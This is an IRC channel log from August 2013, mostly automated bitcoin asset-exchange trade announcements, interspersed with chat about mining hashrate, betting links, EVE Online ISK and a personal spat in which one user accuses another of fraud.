no contracts published, noname ipo-er. Aug 02 00:29:47 not much to go by. Aug 02 00:30:03 [BTCTC] [COGNITIVE] 1 @ 0.48 BTC [-] Aug 02 00:30:26 [BTCTC] [KENILWORTH] 1 @ 0.001799 BTC [+] Aug 02 00:30:29 http://bitbet.us/bet/496/btc-network-hashrate-will-exceed-1-000-th-s-before/ Aug 02 00:30:30 [BTCTC] [LABCOIN] 199 @ 0.00251 = 0.4995 BTC [+] Aug 02 00:30:32 [BTCTC] [KENILWORTH] 3 @ 0.001799 = 0.0054 BTC [+] Aug 02 00:30:33 BitBet - BTC network hashrate will exceed 1,000 TH/s before December 14th 2013 Aug 02 00:30:37 how the fuck is it reaching 1petahahs Aug 02 00:31:36 400gh machines coming this month and next few months Aug 02 00:32:14 It's the guys who did Bter. Probably won't indulge, but thought it might be worth gathering a bit more info. I may be biased because of how much I just made flipping Labcoins :) Aug 02 00:32:15 orders from last year still being delivered Aug 02 00:32:19 all that stuff Aug 02 00:32:33 Graet outrageous. i doubt anyone outside of the pools etc even realises how fucking huge we are by now. Aug 02 00:32:49 grilledcat what's bter ? Aug 02 00:32:55 yiou're a fucking mine of information aren't you. Aug 02 00:33:04 I'm not going near BTCGarden, is silly overvalued so too much supply for proper tulipbulb crazyness like labcoin Aug 02 00:33:11 yeah, before asic the network was like 30Th now its 299Th Aug 02 00:33:26 ;;nethash Aug 02 00:33:27 299708.278937 Aug 02 00:33:33 ;;estimate Aug 02 00:33:34 Next difficulty estimate | 36792653.7931 based on data since last change | 41868124.0293 based on data for last three days Aug 02 00:33:39 yum Aug 02 00:33:42 [BTCTC] [TAT.ASICMINER] 23 @ 0.0415 = 0.9545 BTC [-] Aug 02 00:34:05 time to kill off the last of the non free power gpu miners lol Aug 02 00:34:06 mircea_popescu lol bter is a tiny exchange. Aug 02 00:34:11 [HAVELOCK] [AM100] 12 @ 0.03899999 = 0.468 BTC [+] Aug 02 00:34:21 [BTCTC] [BTCGARDEN] 150 @ 0.016 = 2.4 BTC [+] Aug 02 00:34:39 interesting. Aug 02 00:34:41 [BTCTC] [ACTIVEMINING] 50 @ 0.006191 = 0.3096 BTC [+] Aug 02 00:34:43 [BTCTC] [ACTIVEMINING] 250 @ 0.006192 = 1.548 BTC [+] Aug 02 00:35:05 by the way, for all the new ppls : if you have eve isk i want to hear from you. Aug 02 00:35:38 [HAVELOCK] [SMG] 85 @ 0.0002687 = 0.0228 BTC [+] Aug 02 00:36:00 [HAVELOCK] [LABCO] 3 @ 0.00254 = 0.0076 BTC [-] Aug 02 00:36:03 mircea_popescu, you starting an ISK<->BTC exchange? Aug 02 00:36:58 [BTCTC] [BTCGARDEN] 200 @ 0.016 = 3.2 BTC [+] Aug 02 00:37:00 no. if he was there would already be an IPO Aug 02 00:37:06 [BTCTC] [TAT.ASICMINER] 5 @ 0.04191 = 0.2096 BTC [+] Aug 02 00:37:14 i have 500mil isk Aug 02 00:37:22 grilledcat nah, just a corp Aug 02 00:37:32 lewicki http://trilema.com/2013/bitcoins-eve-corporation/ Aug 02 00:38:58 [BTCTC] [LABCOIN] 20 @ 0.002499 = 0.05 BTC [-] Aug 02 00:39:00 [BTCTC] [LABCOIN] 30 @ 0.0025 = 0.075 BTC [+] Aug 02 00:39:01 [BTCTC] [LABCOIN] 25 @ 0.002507 = 0.0627 BTC [+] Aug 02 00:39:02 [BTCTC] [LABCOIN] 323 @ 0.00251 = 0.8107 BTC [+] Aug 02 00:39:11 I have eve isk, or I would if I reactivated my accounts Aug 02 00:39:15 [BTCTC] [BTCGARDEN] 2430 @ 0.016 = 38.88 BTC [+] Aug 02 00:39:33 I forget how much, maybe 1-5bn, plus another 15bn in assets Aug 02 00:39:58 [BTCTC] [BTCGARDEN] 166 @ 0.016 = 2.656 BTC [+] Aug 02 00:40:01 [BTCTC] [BTCGARDEN] 75 @ 0.016 = 1.2 BTC [+] Aug 02 00:41:14 [BTCTC] [BTC-BOND] 2 @ 0.009999 = 0.02 BTC [+] Aug 02 00:41:40 [HAVELOCK] [AM100] 32 @ 0.03899999 = 1.248 BTC [+] Aug 02 00:43:37 [BTCTC] [BTCGARDEN] 100 @ 0.016 = 1.6 BTC [+] Aug 02 00:44:01 [BTCTC] [ASICMINER-PT] 1 @ 4.19 BTC [+] Aug 02 00:44:02 [BTCTC] [ASICMINER-PT] 8 @ 4.19 = 33.52 BTC [+] Aug 02 00:47:12 [BTCTC] [LABCOIN] 2 @ 0.002509 = 0.005 BTC [-] Aug 02 00:48:21 [HAVELOCK] [AM100] 1 @ 0.03899999 BTC [+] Aug 02 00:48:23 [HAVELOCK] [AM100] 49 @ 0.0395 = 1.9355 BTC [+] Aug 02 00:48:28 [HAVELOCK] [AM100] 1 @ 0.0395 BTC [+] Aug 02 00:49:49 [HAVELOCK] [LABCO] 100 @ 0.00254 = 0.254 BTC [-] Aug 02 00:49:57 lol MPSIC applies to 1Bitcoin in EVE Aug 02 00:50:07 [HAVELOCK] [LABCO] 1500 @ 0.00254 = 3.81 BTC [-] Aug 02 00:50:07 as a tax rate Aug 02 00:50:39 [BTCTC] [LABCOIN] 400 @ 0.0024 = 0.96 BTC [-] Aug 02 00:50:40 [BTCTC] [LABCOIN] 324 @ 0.002309 = 0.7481 BTC [-] Aug 02 00:50:42 [BTCTC] [BTCGARDEN] 65 @ 0.016 = 1.04 BTC [+] Aug 02 00:50:43 [BTCTC] [LABCOIN] 560 @ 0.002308 = 1.2925 BTC [-] Aug 02 00:50:44 [BTCTC] [LABCOIN] 166 @ 0.002307 = 0.383 BTC [-] Aug 02 00:50:45 [BTCTC] [LABCOIN] 20 @ 0.002306 = 0.0461 BTC [-] Aug 02 00:50:46 [BTCTC] [LABCOIN] 981 @ 0.002306 = 2.2622 BTC [-] Aug 02 00:50:47 [BTCTC] [LABCOIN] 87 @ 0.002302 = 0.2003 BTC [-] Aug 02 00:50:48 [BTCTC] [LABCOIN] 13 @ 0.002301 = 0.0299 BTC [-] Aug 02 00:50:50 [BTCTC] [LABCOIN] 512 @ 0.0023 = 1.1776 BTC [-] Aug 02 00:50:51 [BTCTC] [LABCOIN] 1 @ 0.0023 BTC [-] Aug 02 00:50:52 [BTCTC] [LABCOIN] 55 @ 0.002258 = 0.1242 BTC [-] Aug 02 00:50:53 [BTCTC] [LABCOIN] 88 @ 0.002256 = 0.1985 BTC [-] Aug 02 00:50:54 [BTCTC] [LABCOIN] 400 @ 0.002255 = 0.902 BTC [-] Aug 02 00:50:55 [BTCTC] [LABCOIN] 130 @ 0.002255 = 0.2932 BTC [-] Aug 02 00:50:56 [BTCTC] [LABCOIN] 3 @ 0.00224 = 0.0067 BTC [-] Aug 02 00:50:57 [BTCTC] [LABCOIN] 218 @ 0.002201 = 0.4798 BTC [-] Aug 02 00:50:58 [BTCTC] [LABCOIN] 111 @ 0.0022 = 0.2442 BTC [-] Aug 02 00:50:59 [BTCTC] [LABCOIN] 640 @ 0.0022 = 1.408 BTC [-] Aug 02 00:51:20 [HAVELOCK] [LABCO] 51 @ 0.00254 = 0.1295 BTC [-] Aug 02 00:51:33 [BTCTC] [TAT.ASICMINER] 1 @ 0.0415 BTC [-] Aug 02 00:51:46 [BTCTC] [TAT.ASICMINER] 39 @ 0.04191 = 1.6345 BTC [+] Aug 02 00:52:30 [BTCTC] [LABCOIN] 4346 @ 0.0023 = 9.9958 BTC [+] Aug 02 00:52:40 jurov hm ? Aug 02 00:52:44 [BTCTC] [ASICMINER-PT] 1 @ 4.199 BTC [+] Aug 02 00:52:45 [BTCTC] [ASICMINER-PT] 1 @ 4.2 BTC [+] Aug 02 00:53:40 found the corporation, there's 4.9% tax rate, chuckled Aug 02 00:53:54 hehe Aug 02 00:54:15 o, you in eve ? so apply. Aug 02 00:54:18 [MPEX] [S.MPOE] 13324 @ 0.00081854 = 10.9062 BTC [-] Aug 02 00:54:20 [MPEX] [S.MPOE] 2726 @ 0.00081838 = 2.2309 BTC [-] Aug 02 00:54:32 will apply later, am still in tutorial and 30 hops away Aug 02 00:54:37 a ok. Aug 02 00:54:45 apply anyway tho, it tells you what to do. Aug 02 00:55:01 good for newbs. Aug 02 00:55:57 dunno... i seem to get lots of free stuff from the minmatar uni Aug 02 00:55:57 what could someone do with 10000 Million isk Aug 02 00:56:13 KRS1 buy stuff mostly. Aug 02 00:56:36 i definitely need better ship first Aug 02 00:56:39 jurov yeah, career missions are a good way to start. Aug 02 00:56:41 well ealier i think you said you wanted to hear from those with isk? Aug 02 00:56:47 a. Aug 02 00:59:16 Did this just turn into the Eve Online Noob Hour?! Aug 02 00:59:58 yeah. Aug 02 01:00:16 much better than btctc noob hour Aug 02 01:01:01 [BTCTC] [LABCOIN] 324 @ 0.002502 = 0.8106 BTC [+] Aug 02 01:01:37 http://research.microsoft.com/pubs/167713/WhyFromNigeria.pdf Aug 02 01:01:59 KRS1 you getting pms ? Aug 02 01:02:33 [BTCTC] [LABCOIN] 400 @ 0.002499 = 0.9996 BTC [-] Aug 02 01:03:10 Basically, scammers say they're from Nigeria on purpose as a method of removing false positives in their search for the most gullible people Aug 02 01:03:47 http://www.evepms.com/ Aug 02 01:03:50 PMS | EVE Medical Systems Aug 02 01:04:07 evening PMS Aug 02 01:04:14 [HAVELOCK] [AM100] 448 @ 0.0395 = 17.696 BTC [+] Aug 02 01:04:26 [HAVELOCK] [AM100] 16 @ 0.0395 = 0.632 BTC [+] Aug 02 01:07:31 [BTCTC] [BTC-BOND] 10 @ 0.009999 = 0.1 BTC [+] Aug 02 01:07:38 [HAVELOCK] [AM1] 1 @ 3.90000001 BTC [-] Aug 02 01:09:02 [BTCTC] [DMS.MINING] 39 @ 0.0084 = 0.3276 BTC [+] Aug 02 01:09:03 [BTCTC] [DMS.MINING] 60 @ 0.008489 = 0.5093 BTC [+] Aug 02 01:09:05 [BTCTC] [DMS.MINING] 31 @ 0.00849 = 0.2632 BTC [+] Aug 02 01:09:06 [BTCTC] [DMS.MINING] 110 @ 0.008667 = 0.9534 BTC [+] Aug 02 01:09:07 [BTCTC] [DMS.MINING] 116 @ 0.008669 = 1.0056 BTC [+] Aug 02 01:09:08 [BTCTC] [DMS.MINING] 3 @ 0.008989 = 0.027 BTC [+] Aug 02 01:09:48 [BTCTC] [DMS.MINING] 130 @ 0.0093 = 1.209 BTC [+] Aug 02 01:09:58 [BTCTC] [COGNITIVE] 2 @ 0.511 = 1.022 BTC [+] Aug 02 01:10:58 f Aug 02 01:11:04 whups Aug 02 01:12:31 [HAVELOCK] [AM1] 1 @ 3.90000001 BTC [-] Aug 02 01:13:34 [HAVELOCK] [LABCO] 1 @ 0.00297 BTC [+] Aug 02 01:13:51 [BTCTC] [LABCOIN] 500 @ 0.002497 = 1.2485 BTC [-] Aug 02 01:14:34 [BTCTC] [LABCOIN] 500 @ 0.002497 = 1.2485 BTC [-] Aug 02 01:15:24 [BTCTC] [BTCGARDEN] 5 @ 0.01556 = 0.0778 BTC [-] Aug 02 01:15:26 [BTCTC] [BTCGARDEN] 10 @ 0.01556 = 0.1556 BTC [-] Aug 02 01:15:27 [BTCTC] [BTCGARDEN] 30 @ 0.01556 = 0.4668 BTC [-] Aug 02 01:15:28 [BTCTC] [BTCGARDEN] 200 @ 0.01556 = 3.112 BTC [-] Aug 02 01:15:29 [BTCTC] [BTCGARDEN] 1000 @ 0.01555 = 15.55 BTC [-] Aug 02 01:15:31 [BTCTC] [BTCGARDEN] 13 @ 0.01555 = 0.2022 BTC [-] Aug 02 01:15:32 [BTCTC] [BTCGARDEN] 742 @ 0.0155 = 11.501 BTC [-] Aug 02 01:15:33 [BTCTC] [LABCOIN] 200 @ 0.002497 = 0.4994 BTC [-] Aug 02 01:15:45 gardencoins on sale? Aug 02 01:16:46 still along way to go! Aug 02 01:16:49 I wonder if it's the investor giving up obtcgarden selling it lower than IPO price Aug 02 01:16:53 [BTCTC] [TAT.ASICMINER] 3 @ 0.04151 = 0.1245 BTC [-] Aug 02 01:16:54 [BTCTC] [TAT.ASICMINER] 177 @ 0.0415 = 7.3455 BTC [-] Aug 02 01:17:21 [BTCTC] [BTCGARDEN] 258 @ 0.0155 = 3.999 BTC [-] Aug 02 01:17:23 [BTCTC] [BTCGARDEN] 242 @ 0.0153 = 3.7026 BTC [-] Aug 02 01:17:51 [BTCTC] [ASICMINER-PT] 1 @ 4.201 BTC [+] Aug 02 01:17:54 [BTCTC] [BTCGARDEN] 10 @ 0.016 = 0.16 BTC [+] Aug 02 01:18:16 [BTCTC] [ACTIVEMINING] 200 @ 0.006159 = 1.2318 BTC [-] Aug 02 01:20:13 [BTCTC] [LABCOIN] 300 @ 0.002494 = 0.7482 BTC [-] Aug 02 01:20:15 [BTCTC] [LABCOIN] 70 @ 0.002494 = 0.1746 BTC [-] Aug 02 01:20:57 [BTCTC] [TAT.ASICMINER] 15 @ 0.04191 = 0.6287 BTC [+] Aug 02 01:22:14 !ticker h sdice Aug 02 01:22:16 Quest for vision is a great blessing. Aug 02 01:23:44 [BTCTC] [KENILWORTH] 8 @ 0.0018 = 0.0144 BTC [+] Aug 02 01:24:02 [BTCTC] [TAT.ASICMINER] 128 @ 0.0415 = 5.312 BTC [-] Aug 02 01:24:04 [BTCTC] [TAT.ASICMINER] 50 @ 0.0415 = 2.075 BTC [-] Aug 02 01:24:04 [BTCTC] [TAT.ASICMINER] 500 @ 0.041 = 20.5 BTC [-] Aug 02 01:24:06 [BTCTC] [TAT.ASICMINER] 1 @ 0.041 BTC [-] Aug 02 01:29:00 [BTCTC] [LABCOIN] 3 @ 0.002491 = 0.0075 BTC [-] Aug 02 01:29:01 [BTCTC] [LABCOIN] 2 @ 0.002491 = 0.005 BTC [-] Aug 02 01:29:47 [HAVELOCK] [SDSTM] 2 @ 0.0080001 = 0.016 BTC [-] Aug 02 01:29:49 [HAVELOCK] [SDSTM] 587 @ 0.008 = 4.696 BTC [-] Aug 02 01:29:52 [BTCTC] [LABCOIN] 1 @ 0.002491 BTC [-] Aug 02 01:33:07 [BTCTC] [ASICMINER-PT] 1 @ 4.17 BTC [-] Aug 02 01:33:09 [BTCTC] [ASICMINER-PT] 1 @ 4.167 BTC [-] Aug 02 01:33:10 [BTCTC] [ASICMINER-PT] 1 @ 4.166 BTC [-] Aug 02 01:33:11 [BTCTC] [ASICMINER-PT] 8 @ 4.165 = 33.32 BTC [-] Aug 02 01:33:12 [BTCTC] [ASICMINER-PT] 3 @ 4.15 = 12.45 BTC [-] Aug 02 01:33:13 [BTCTC] [ASICMINER-PT] 2 @ 4.149 = 8.298 BTC [-] Aug 02 01:33:14 [BTCTC] [ASICMINER-PT] 4 @ 4.147 = 16.588 BTC [-] Aug 02 01:33:15 [BTCTC] [ASICMINER-PT] 4 @ 4.141 = 16.564 BTC [-] Aug 02 01:33:16 [BTCTC] [ASICMINER-PT] 23 @ 4.14 = 95.22 BTC [-] Aug 02 01:33:17 [BTCTC] [ASICMINER-PT] 8 @ 4.134 = 33.072 BTC [-] Aug 02 01:33:18 [BTCTC] [ASICMINER-PT] 5 @ 4.132 = 20.66 BTC [-] Aug 02 01:33:19 [BTCTC] [ASICMINER-PT] 1 @ 4.128 BTC [-] Aug 02 01:33:20 [BTCTC] [ASICMINER-PT] 1 @ 4.126 BTC [-] Aug 02 01:33:21 [BTCTC] [ASICMINER-PT] 1 @ 4.068 BTC [-] Aug 02 01:33:22 [BTCTC] [ASICMINER-PT] 1 @ 4.066 BTC [-] Aug 02 01:33:24 [BTCTC] [ASICMINER-PT] 1 @ 4.065 BTC [-] Aug 02 01:33:24 [BTCTC] [ASICMINER-PT] 1 @ 4.064 BTC [-] Aug 02 01:33:25 [BTCTC] [ASICMINER-PT] 2 @ 4.063 = 8.126 BTC [-] Aug 02 01:33:26 [BTCTC] [ASICMINER-PT] 7 @ 4.03 = 28.21 BTC [-] Aug 02 01:33:27 [BTCTC] [ASICMINER-PT] 15 @ 4.025 = 60.375 BTC [-] Aug 02 01:33:28 [BTCTC] [ASICMINER-PT] 2 @ 4.013 = 8.026 BTC [-] Aug 02 01:33:29 [BTCTC] [ASICMINER-PT] 2 @ 4.012 = 8.024 BTC [-] Aug 02 01:33:29 later gang Aug 02 01:33:30 [BTCTC] [ASICMINER-PT] 1 @ 4.011 BTC [-] Aug 02 01:33:31 [BTCTC] [ASICMINER-PT] 1 @ 4.01 BTC [-] Aug 02 01:33:32 [BTCTC] [ASICMINER-PT] 7 @ 4.01 = 28.07 BTC [-] Aug 02 01:33:49 bye, wow somebody dumped a lot of asicm shares :D Aug 02 01:33:59 [BTCTC] [LABCOIN] 16 @ 0.002364 = 0.0378 BTC [-] Aug 02 01:33:59 [BTCTC] [LABCOIN] 20 @ 0.002363 = 0.0473 BTC [-] Aug 02 01:34:01 [BTCTC] [LABCOIN] 80 @ 0.002362 = 0.189 BTC [-] Aug 02 01:34:02 [BTCTC] [LABCOIN] 50 @ 0.00236 = 0.118 BTC [-] Aug 02 01:34:03 [BTCTC] [LABCOIN] 300 @ 0.002359 = 0.7077 BTC [-] Aug 02 01:34:04 [BTCTC] [LABCOIN] 317 @ 0.002358 = 0.7475 BTC [-] Aug 02 01:34:05 [BTCTC] [LABCOIN] 83 @ 0.002357 = 0.1956 BTC [-] Aug 02 01:34:06 [BTCTC] [LABCOIN] 500 @ 0.002356 = 1.178 BTC [-] **** BEGIN LOGGING AT Fri Aug 2 08:29:42 2013 Aug 02 08:29:51 hi Aug 02 08:30:00 hello Aug 02 08:30:13 [BTCTC] [BTCGARDEN] 1110 @ 0.016 = 17.76 BTC [+] Aug 02 08:30:31 where us bit instant? Aug 02 08:30:47 is Aug 02 08:31:01 LainZ Lee- leotreasure lewicki lippoper ll LorenzoMoney LorenzoMoney2 louong Luke-Jr Aug 02 08:31:04 thestringpuller lolk. Aug 02 08:31:24 for ever Aug 02 08:31:28 [BTCTC] [LABCOIN] 50 @ 0.001795 = 0.0898 BTC [+] Aug 02 08:31:29 [BTCTC] [LABCOIN] 1502 @ 0.001848 = 2.7757 BTC [+] Aug 02 08:32:02 no what we use? Aug 02 08:32:14 now Aug 02 08:32:14 hey how long am i locked out after i get access denied on btct.co? anyone? Aug 02 08:32:32 [BTCTC] [LABCOIN] 10 @ 0.00182 = 0.0182 BTC [-] Aug 02 08:32:46 buy Aug 02 08:32:58 bitcoin Aug 02 08:33:15 antiwarfreeman you could try making a wot profile and going otc. Aug 02 08:33:48 what's a good android wallet Aug 02 08:33:48 [BTCTC] [LABCOIN] 27 @ 0.001848 = 0.0499 BTC [+] Aug 02 08:33:58 [BTCTC] [LABCOIN] 12 @ 0.001848 = 0.0222 BTC [+] Aug 02 08:34:46 I bought some on coinbase but haven't got them yet Aug 02 08:34:58 [BTCTC] [LABCOIN] 3 @ 0.001849 = 0.0055 BTC [+] Aug 02 08:35:00 [BTCTC] [LABCOIN] 15 @ 0.00185 = 0.0278 BTC [+] Aug 02 08:35:45 how long dose coinbase take? Aug 02 08:36:03 [BTCTC] [LABCOIN] 5 @ 0.00185 = 0.0093 BTC [+] Aug 02 08:37:19 antiwarfreeman occasionally weeks. Aug 02 08:37:43 where to mix? Aug 02 08:39:20 Chaaang-Noi: probably due to side effects that are manageable Aug 02 08:39:27 ie, not eating or sleeping Aug 02 08:40:45 [BTCTC] [BTCGARDEN] 2000 @ 0.016 = 32 BTC [+] Aug 02 08:40:48 [BTCTC] [TAT.MINIGAME] 4 @ 0.0002499 = 0.001 BTC [+] Aug 02 08:40:50 [BTCTC] [BASIC-MINING] 3 @ 0.4611 = 1.3833 BTC [-] Aug 02 08:40:52 [BTCTC] [BASIC-MINING] 1 @ 0.4612 BTC [+] Aug 02 08:40:52 [BTCTC] [BASIC-MINING] 1 @ 0.4614 BTC [+] Aug 02 08:41:46 than Aug 02 08:41:51 x Aug 02 08:42:04 "I don't know what this bet is about - it refers to things I have never heard of - but I am betting "no" since the odds are so skewed. Why put 10 on something against nothing?" Aug 02 08:42:08 [BTCTC] [LABCOIN] 15 @ 0.001966 = 0.0295 BTC [+] Aug 02 08:42:09 http://bitbet.us/bet/495/there-will-be-blood/#c1167 Aug 02 08:42:09 [BTCTC] [LABCOIN] 30 @ 0.001967 = 0.059 BTC [+] Aug 02 08:42:10 [BTCTC] [LABCOIN] 60 @ 0.001968 = 0.1181 BTC [+] Aug 02 08:42:11 [BTCTC] [LABCOIN] 1 @ 0.001999 BTC [+] Aug 02 08:42:12 [BTCTC] [LABCOIN] 8 @ 0.002 = 0.016 BTC [+] Aug 02 08:42:13 [BTCTC] [LABCOIN] 61 @ 0.002043 = 0.1246 BTC [+] Aug 02 08:42:15 the beauty of market forces at work. Aug 02 08:42:17 BitBet - There will be blood Aug 02 08:43:07 ;;nethash Aug 02 08:43:09 296211.542558 Aug 02 08:43:33 [BTCTC] [BTCGARDEN] 300 @ 0.016 = 4.8 BTC [+] Aug 02 08:43:55 [BTCTC] [BTCGARDEN] 2 @ 0.01599 = 0.032 BTC [-] Aug 02 08:46:18 [BTCTC] [LABCOIN] 2 @ 0.001915 = 0.0038 BTC [-] Aug 02 08:46:32 [HAVELOCK] [LABCO] 14 @ 0.00249999 = 0.035 BTC [-] Aug 02 08:46:45 [BTCTC] [BTCGARDEN] 13 @ 0.01599 = 0.2079 BTC [-] Aug 02 08:48:20 [BTCTC] [ASICMINER-PT] 1 @ 4.033 BTC [-] Aug 02 08:48:52 what is this, I dont even Aug 02 08:49:15 [BTCTC] [LABCOIN] 98 @ 0.001915 = 0.1877 BTC [-] Aug 02 08:49:17 [BTCTC] [LABCOIN] 17 @ 0.001911 = 0.0325 BTC [-] Aug 02 08:49:18 [BTCTC] [LABCOIN] 17 @ 0.00191 = 0.0325 BTC [-] Aug 02 08:49:36 dub which ? Aug 02 08:49:53 your commentors Aug 02 08:50:02 part of them are very strange. Aug 02 08:50:39 [BTCTC] [LABCOIN] 5 @ 0.002018 = 0.0101 BTC [+] Aug 02 08:52:40 [BTCTC] [LABCOIN] 23 @ 0.001989 = 0.0457 BTC [-] Aug 02 08:52:41 [BTCTC] [LABCOIN] 17 @ 0.00199 = 0.0338 BTC [+] Aug 02 08:53:17 [BTCTC] [LABCOIN] 23 @ 0.00199 = 0.0458 BTC [+] Aug 02 08:53:19 [BTCTC] [LABCOIN] 100 @ 0.00199 = 0.199 BTC [+] Aug 02 08:57:02 [BTCTC] [BTCGARDEN] 75 @ 0.01599 = 1.1993 BTC [-] Aug 02 08:57:11 [MPEX] [S.MPOE] 5930 @ 0.00081663 = 4.8426 BTC [+] Aug 02 08:57:12 [MPEX] [S.MPOE] 4170 @ 0.00081708 = 3.4072 BTC [+] Aug 02 08:58:39 [BTCTC] [BTCGARDEN] 565 @ 0.01599 = 9.0344 BTC [-] Aug 02 08:59:48 [HAVELOCK] [AM100] 25 @ 0.04 = 1 BTC [+] Aug 02 09:02:17 [BTCTC] [BTCGARDEN] 12400 @ 0.016 = 198.4 BTC [+] Aug 02 09:02:40 [BTCTC] [BTCGARDEN] 10 @ 0.016 = 0.16 BTC [+] Aug 02 09:03:38 [BTCTC] [BTCGARDEN] 9 @ 0.016 = 0.144 BTC [+] Aug 02 09:04:18 [MPEX] [S.MPOE] 4050 @ 0.0008162 = 3.3056 BTC [-] Aug 02 09:05:43 [BTCTC] [BTCGARDEN] 68 @ 0.016 = 1.088 BTC [+] Aug 02 09:06:00 another 24h for garden to sell out or quicker? Aug 02 09:12:57 [BTCTC] [ACTIVEMINING] 25 @ 0.006136 = 0.1534 BTC [+] Aug 02 09:13:20 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [+] Aug 02 09:17:01 [MPEX] [S.MPOE] 350 @ 0.00081595 = 0.2856 BTC [-] Aug 02 09:17:03 [MPEX] [S.MPOE] 16030 @ 0.00081708 = 13.0978 BTC [+] Aug 02 09:17:04 [MPEX] [S.MPOE] 320 @ 0.00081755 = 0.2616 BTC [+] Aug 02 09:18:36 [BTCTC] [LABCOIN] 74 @ 0.001976 = 0.1462 BTC [-] Aug 02 09:18:37 [BTCTC] [LABCOIN] 445 @ 0.001977 = 0.8798 BTC [+] Aug 02 09:18:55 [BTCTC] [ASICMINER-PT] 3 @ 4.097 = 12.291 BTC [+] Aug 02 09:18:56 [BTCTC] [ASICMINER-PT] 10 @ 4.098 = 40.98 BTC [+] Aug 02 09:18:57 [BTCTC] [ASICMINER-PT] 9 @ 4.1 = 36.9 BTC [+] Aug 02 09:20:03 [BTCTC] [LABCOIN] 10 @ 0.001981 = 0.0198 BTC [+] Aug 02 09:20:18 [BTCTC] [ACTIVEMINING] 254 @ 0.006101 = 1.5497 BTC [-] Aug 02 09:20:21 [BTCTC] [LABCOIN] 2 @ 0.0019 = 0.0038 BTC [-] Aug 02 09:20:46 [BTCTC] [LABCOIN] 7 @ 0.001864 = 0.013 BTC [-] Aug 02 09:22:40 re https://bitcointalk.org/index.php?topic=261465.0, what's the call here ? options : a) avalon guy actually moved on to scamming ; b) volcanic support people resulting in butthurt noobs ; c) total fud campaign a la what happened with coinabul earlier this year. Aug 02 09:22:45 [BTCTC] [LABCOIN] 1 @ 0.00187 BTC [+] Aug 02 09:28:16 [HAVELOCK] [AM100] 1 @ 0.0395 BTC [-] Aug 02 09:29:38 [HAVELOCK] [SDSTM] 4 @ 0.0084 = 0.0336 BTC [+] Aug 02 09:29:40 [BTCTC] [BTCGARDEN] 149 @ 0.016 = 2.384 BTC [+] Aug 02 09:29:48 [BTCTC] [BTCGARDEN] 80 @ 0.016 = 1.28 BTC [+] Aug 02 09:30:25 Chaaang-Noi: what are you smoking, i've sent like $150k of crap to people this week xD Aug 02 09:30:35 and its only thursday Aug 02 09:31:18 [BTCTC] [BTCGARDEN] 1000 @ 0.016 = 16 BTC [+] Aug 02 09:31:28 anyway, your opinion is worth nil to me considering you're a known criminal ;) Aug 02 09:31:45 Chaaang-Noi: he should ask his local customs office what's up, since it's been sent /twice/ so far Aug 02 09:31:48 [BTCTC] [ASICMINER-PT] 1 @ 4.054 BTC [-] Aug 02 09:31:49 :) Aug 02 09:32:17 lol, you operated a pirate pass through and admit to routinely committing fraud against users of bitcoin asset exchanges Aug 02 09:32:37 [HAVELOCK] [SDSTM] 1 @ 0.008 BTC [-] Aug 02 09:32:41 lmao, i think you're hilarious Aug 02 09:33:03 aside from that, i dont really give you two thoughts except for when you ping me ;) Aug 02 09:33:26 [MPEX] [S.MPOE] 4000 @ 0.00081755 = 3.2702 BTC [+] Aug 02 09:33:31 anyway, i'm busy, find something more interesting to talk about so i don't have to tab back to IRC Aug 02 09:34:02 Chaaang-Noi: yes, i hold very low regard for criminals and insult them at every opportunity - especially those who make it a habit to defraud my fellow bitcoiners ;) Aug 02 09:34:14 [BTCTC] [BITVPS] 1 @ 0.001601 BTC [+] Aug 02 09:34:16 anyway, afk to get /actual/ work done Aug 02 09:34:40 [BTCTC] [BTCGARDEN] 250 @ 0.01597 = 3.9925 BTC [-] Aug 02 09:35:19 [BTCTC] [BTCGARDEN] 5000 @ 0.016 = 80 BTC [+] Aug 02 09:35:27 [BTCTC] [BTCGARDEN] 29 @ 0.01596 = 0.4628 BTC [-] Aug 02 09:35:30 [BTCTC] [BTCGARDEN] 623 @ 0.016 = 9.968 BTC [+] Aug 02 09:35:31 [23:31] Chaaang-Noi: he should ask his local customs office what's up, since it's been sent /twice/ so far << read what i bother to type Aug 02 09:35:52 [BTCTC] [LABCOIN] 3 @ 0.001967 = 0.0059 BTC [+] Aug 02 09:36:15 in any case, you're a common criminal so again, whatever deluded view of the world you have is irrelevant in my eyes Aug 02 09:36:38 no, i'm referring to your activities WITH bitcoin. Aug 02 09:36:51 [BTCTC] [LABCOIN] 3 @ 0.001879 = 0.0056 BTC [-] Aug 02 09:36:54 you're probably under active investigation by the SEC right now Aug 02 09:37:09 i've simply watched other people chew you out for quite a while Aug 02 09:37:14 its kind of funny Aug 02 09:37:23 yeah, cuz you fucked off to thailand to commit your crimes Aug 02 09:37:40 no, i've watched people post lots of documentation about it Aug 02 09:38:05 you're not worth the effort of grepping my irc logs ;) Aug 02 09:38:20 anyway, like i said multiple times, i've no time for you Aug 02 09:38:23 buhbye nao Aug 02 09:40:14 [BTCTC] [LABCOIN] 400 @ 0.001967 = 0.7868 BTC [+] Aug 02 09:40:44 [BTCTC] [BTCGARDEN] 30 @ 0.01595 = 0.4785 BTC [-] Aug 02 09:40:46 [BTCTC] [BTCGARDEN] 1875 @ 0.01595 = 29.9063 BTC [-] Aug 02 09:40:47 [BTCTC] [BTCGARDEN] 105 @ 0.01594 = 1.6737 BTC [-] Aug 02 09:40:48 [BTCTC] [BTCGARDEN] 190 @ 0.01594 = 3.0286 BTC [-] Aug 02 09:40:57 [BTCTC] [BTCGARDEN] 3 @ 0.016 = 0.048 BTC [+] Aug 02 09:41:23 [BTCTC] [BTCGARDEN] 150 @ 0.016 = 2.4 BTC [+] Aug 02 09:44:32 [BTCTC] [ACTIVEMINING] 4 @ 0.006341 = 0.0254 BTC [+] Aug 02 09:47:07 [BTCTC] [ASICMINER-PT] 1 @ 4.155 BTC [+] Aug 02 09:47:21 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.002986 BTC [+] Aug 02 09:47:26 so xbond Aug 02 09:50:45 [BTCTC] [ACTIVEMINING] 1 @ 0.0001 BTC [-] Aug 02 09:51:30 BTC-BOND best Aug 02 09:51:34 mircea_popescu: my money is on (b) Aug 02 09:52:35 BTC-BOND? Aug 02 09:52:44 [BTCTC] [ACTIVEMINING] 1 @ 0.006207 BTC [+] Aug 02 09:53:47 qxzn aha Aug 02 09:55:07 [BTCTC] [LABCOIN] 1 @ 0.001948 BTC [-] Aug 02 09:55:08 [BTCTC] [LABCOIN] 9 @ 0.001949 = 0.0175 BTC [+] Aug 02 09:55:09 [BTCTC] [LABCOIN] 100 @ 0.001966 